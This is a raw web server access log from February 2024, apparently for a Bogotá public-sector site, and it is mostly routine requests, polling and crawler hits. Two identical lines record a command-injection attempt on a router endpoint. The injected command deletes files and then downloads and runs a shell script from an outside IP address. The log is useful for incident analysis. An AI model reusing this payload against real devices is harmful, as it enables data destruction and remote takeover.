186.102.12.93 - - [11/Feb/2024:13:42:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+NCtlq2wTV2KKfcGv6th4wIgtvS+fo+WNuumbV7vT6zg7nV12xIIl74SqPMBNOSG6bLLAaNgbsL5Hp8KkmpFDa5u0K+Z8i6DaVyu49sWEdpVvwe7MQZmLw6fTN3Oy9I/SJGkv/KCAshWPl4HUWbxsdU07IT4m53sud0cvoUq7wFdAUG4w79g67F5tf488foVvxtqIJWlOenQ==&u=U2FsdGVkX1+GHY/6BQaWSygMlJVlUJaM9+43JqHgR9g=&y=U2FsdGVkX183rHx9X6M2qgK8dETB8aTgUpQiuMg8so9WCJaJlRBvX6Rg6dOcF3Z/ HTTP/1.1" 200 26
186.102.12.93 - - [11/Feb/2024:13:42:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19PLFTW89FfUUPJbYXIFBXNKUZTx5pdp9hLrj305VaoJUHF1JxrRU6fiDDlgGBgDDm6C2Hcb3frXUwW+h8EL41+uT/USx18wyBZkt6X6xVsHKmh5sqL6abnoHMaQXhF5huWaIKifZuyXI2k0rLlMEBLQzGdTO+jYMpuqo0htXHIIOok5rHX+G23NjqmO//AOWu8N4D7rYKtIg==&u=U2FsdGVkX1+GHY/6BQaWSygMlJVlUJaM9+43JqHgR9g=&y=U2FsdGVkX183rHx9X6M2qgK8dETB8aTgUpQiuMg8so9WCJaJlRBvX6Rg6dOcF3Z/ HTTP/1.1" 200 26
186.102.12.93 - - [11/Feb/2024:13:42:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+7nFpEuZNQhOkjGCVUTymiUElzyJ1QKBs0vYN7kiydjEsoKWZSajtLRRYc/B41yrrXeJwKPESTncfpX0WXIgAP1K/NPI32cE3RG7xB3j1BRRjnJxnd5zvt6pjGOqRFLEZiLz8FjQIt/z9RRY5ER7J/tXNmANf/t2neVrTt3Oeye1RNx0oxr4tK&u=U2FsdGVkX1+GHY/6BQaWSygMlJVlUJaM9+43JqHgR9g=&y=U2FsdGVkX183rHx9X6M2qgK8dETB8aTgUpQiuMg8so9WCJaJlRBvX6Rg6dOcF3Z/ HTTP/1.1" 200 26
201.245.192.253 - - [11/Feb/2024:13:42:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:43:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [11/Feb/2024:13:44:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:44:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:13:44:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:13:46:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:46:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:13:45:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59173
52.167.144.180 - - [11/Feb/2024:13:46:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/1790.pdf HTTP/1.1" 304 -
216.245.221.92 - - [11/Feb/2024:13:47:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:13:48:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:48:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [11/Feb/2024:13:48:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:13:48:41 -0500] "GET /BLA/boletinlegal/cgi-bin/jarrewrite.sh HTTP/1.1" 404 1018
201.245.192.253 - - [11/Feb/2024:13:50:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
173.252.83.5 - - [11/Feb/2024:13:50:25 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 911
20.69.17.254 - - [11/Feb/2024:13:50:30 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [11/Feb/2024:13:50:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:13:50:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:13:52:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [11/Feb/2024:13:52:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2024:13:50:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [11/Feb/2024:13:52:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:53:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
186.102.41.241 - - [11/Feb/2024:13:53:58 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+8rxDL+9RJ0eckksc3k8LbJmCr3OMxXvgbRP8cIlmEo5OnAugipl3gMawZSLJvaZVNcjBXMr0uJlXBxouec6pxL0gpglfcNpoObmsAnX9MFz70iVV8mYFGP4f/4aCMZfNoOp3l8lOBzpT8N/mLpddEOfL9l6NHtLw=&u=U2FsdGVkX19C0ySOEzj7GoNuTRvoMlmzR5Vp8ozaY1g=&y=U2FsdGVkX18zr7yOMNAtlTzn/4bF9vRmPKcrYJnS8bS4E7jML+1tcoly5jtYLlaJ HTTP/1.1" 200 60
201.245.192.253 - - [11/Feb/2024:13:54:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:54:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:13:54:44 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
185.224.128.10 - - [11/Feb/2024:13:54:59 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [11/Feb/2024:13:56:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
185.224.128.10 - - [11/Feb/2024:13:56:19 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
185.224.128.10 - - [11/Feb/2024:13:56:19 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [11/Feb/2024:13:54:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57291
201.245.192.253 - - [11/Feb/2024:13:56:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
131.255.252.86 - - [11/Feb/2024:13:56:51 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Feb/2024:13:57:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2024:13:55:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:13:58:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:13:58:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
172.22.2.4 - - [11/Feb/2024:13:56:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [11/Feb/2024:13:58:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.184 - - [11/Feb/2024:13:59:34 -0500] "GET /Publicaciones/2023EE309834.pdf HTTP/1.1" 404 228
201.245.192.253 - - [11/Feb/2024:14:00:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:14:00:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:14:02:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [11/Feb/2024:14:02:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:14:02:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:14:03:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
172.22.2.4 - - [11/Feb/2024:14:01:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:14:04:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:14:02:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58310
201.245.192.253 - - [11/Feb/2024:14:04:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [11/Feb/2024:14:04:00 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 62310
66.249.66.19 - - [11/Feb/2024:14:05:40 -0500] "GET /Publicaciones/2023EE290208.pdf HTTP/1.1" 404 228
201.245.192.253 - - [11/Feb/2024:14:06:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:14:06:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [11/Feb/2024:14:07:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:14:08:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [11/Feb/2024:14:08:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [11/Feb/2024:14:08:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:14:07:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2024:14:10:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d610ae24beb5094434bff4cfc888fbc4af.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [11/Feb/2024:14:08:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61047
